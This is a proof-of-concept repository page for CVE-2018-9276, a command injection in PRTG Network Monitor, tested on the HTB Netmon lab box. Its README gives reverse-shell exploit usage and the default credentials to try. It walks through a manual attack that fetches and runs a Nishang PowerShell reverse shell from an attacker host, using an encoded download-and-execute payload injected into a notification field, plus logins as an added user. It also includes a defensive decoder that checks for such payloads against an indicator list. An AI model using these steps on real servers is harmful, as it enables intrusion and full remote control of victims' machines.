
CVE-2018-9276 PoC — Paessler PRTG Network Monitor OS Command Injection Vulnerability

Associated Vulnerability
Title: Paessler PRTG Network Monitor OS Command Injection Vulnerability (CVE-2018-9276)
Description: An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.
Description
CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)
Readme
# CVE-2018-9276
CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

# Dependencies
* Impacket (python3 version)
* Netcat
* Msfvenom

# Usage
```
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
```

1. Valid credentials are required to run the exploit. Try the default credentials `prtgadmin:prtgadmin`; it may also be worth checking the PRTG database or logs for them: https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
2. Try `--lport 445` if that port is not already in use.
3. There are a few twisted comments in the code; they might need some modification.
4. It may take a few attempts to succeed. Rebooting the target machine is always a good option, especially when your payload causes some impact.

# Test coverage
HTB Netmon box
```
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
```

# Credit
A big thank you to wildkindcc for the Python 2 version: https://github.com/wildkindcc/CVE-2018-9276

# Expand Knowledge
### Using metasploit
https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

### Remote Code Execution
https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

##### Usage sample
Valid credentials are required to run the exploit. First log in and get the authenticated cookie, then use it to add a new user.
```
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10
```
![Screen Shot 2021-07-29 at 3 14 10 PM](https://user-images.githubusercontent.com/24937594/127426250-d494665c-acc4-496e-b711-bff2c3d71a18.png)

### Advanced manual exploitation without adding a new user
##### Credit belongs to the HTB official writeup
###### PoC: https://www.codewatch.org/blog/?p=453, plus using SMB to get a reverse shell: https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

In case we don't want to add a user, for better OPSEC we can get a reverse shell. However, due to HTML encoding, many characters get encoded. We can bypass this using PowerShell base64 execution. We need to create a base64-encoded command; however, it should be in the encoding that Windows uses, i.e. `UTF-16LE`.
```
echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
```

We use iconv to convert it to the target encoding, and the command will execute this reverse shell from Nishang:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Download the script and append the invocation as its last line.
```
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1
```

Now start a simple HTTP server and create a new notification.
```
python3 -m http.server 80
```

Click Setup > Account Settings > Notifications, then click "Add new notification" on the far right.
Trigger the notification by clicking the bell button:
```
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
```
![Screen Shot 2021-07-29 at 4 08 01 PM](https://user-images.githubusercontent.com/24937594/127429985-9912c1ce-44ce-4a7c-a430-ba41a6cbc4ef.png)
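As an added, defender-side example that is not part of the README or the HTB writeup: the `powershell -enc` payload above is base64 of UTF-16LE text, so a detection rule must decode it the same way before matching on strings such as `IEX` or `downloadstring`. The script below does that over constructed command-line samples; the indicator list and the `192.0.2.10` address are assumptions.

```python
import base64
import re

# PowerShell accepts "-EncodedCommand", any unambiguous prefix ("-e", "-enc", ...)
# and the alias "-ec"; find such a switch and the base64 argument after it.
SWITCH_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Assumed indicator list: substrings that mark a stager rather than an ordinary script.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "invoke-powershelltcp", "tcpclient")

def _is_encoded_switch(switch):
    switch = switch.lower()
    return switch == "ec" or "encodedcommand".startswith(switch)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text from a command line, or None.
    The argument is base64 of UTF-16LE, which is what iconv | base64 produced above."""
    for match in SWITCH_RE.finditer(cmdline):
        if not _is_encoded_switch(match.group(1)):
            continue  # e.g. -ExecutionPolicy is not an encoded command
        try:
            return base64.b64decode(match.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None  # bad base64 or odd byte count: not a UTF-16LE payload
    return None

def flag_command_line(cmdline):
    """Decode any encoded PowerShell in cmdline and report which indicators fire."""
    decoded = decode_encoded_command(cmdline)
    lowered = (decoded or "").lower()
    return {"encoded": decoded is not None, "decoded": decoded,
            "hits": [ind for ind in INDICATORS if ind in lowered]}

def _utf16le_b64(text):  # used only to build the constructed samples below
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

# Constructed samples: a notification parameter shaped like the page's payload
# (placeholder IP), a benign encoded command, and a plain parameter.
SAMPLE_LINES = [
    "abc.txt | powershell -enc " + _utf16le_b64(
        "IEX(new-object net.webclient).downloadstring('http://192.0.2.10/Invoke-PowerShellTcp.ps1')"),
    "powershell -ExecutionPolicy Bypass -EncodedCommand " + _utf16le_b64("Get-Date"),
    "abc.txt",
]

def scan(lines=SAMPLE_LINES):
    # Keep only the lines whose decoded payload matched at least one indicator.
    reports = [(line, flag_command_line(line)) for line in lines]
    return [(line, report) for line, report in reports if report["hits"]]
```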

File Snapshot
```
[4.0K] /data/pocs/b3bc1f2416b1985c953dcad9df7f3102109d8ef5
├── [ 16K] exploit.py
├── [1.0K] LICENSE
└── [4.0K] README.md

0 directories, 3 files
```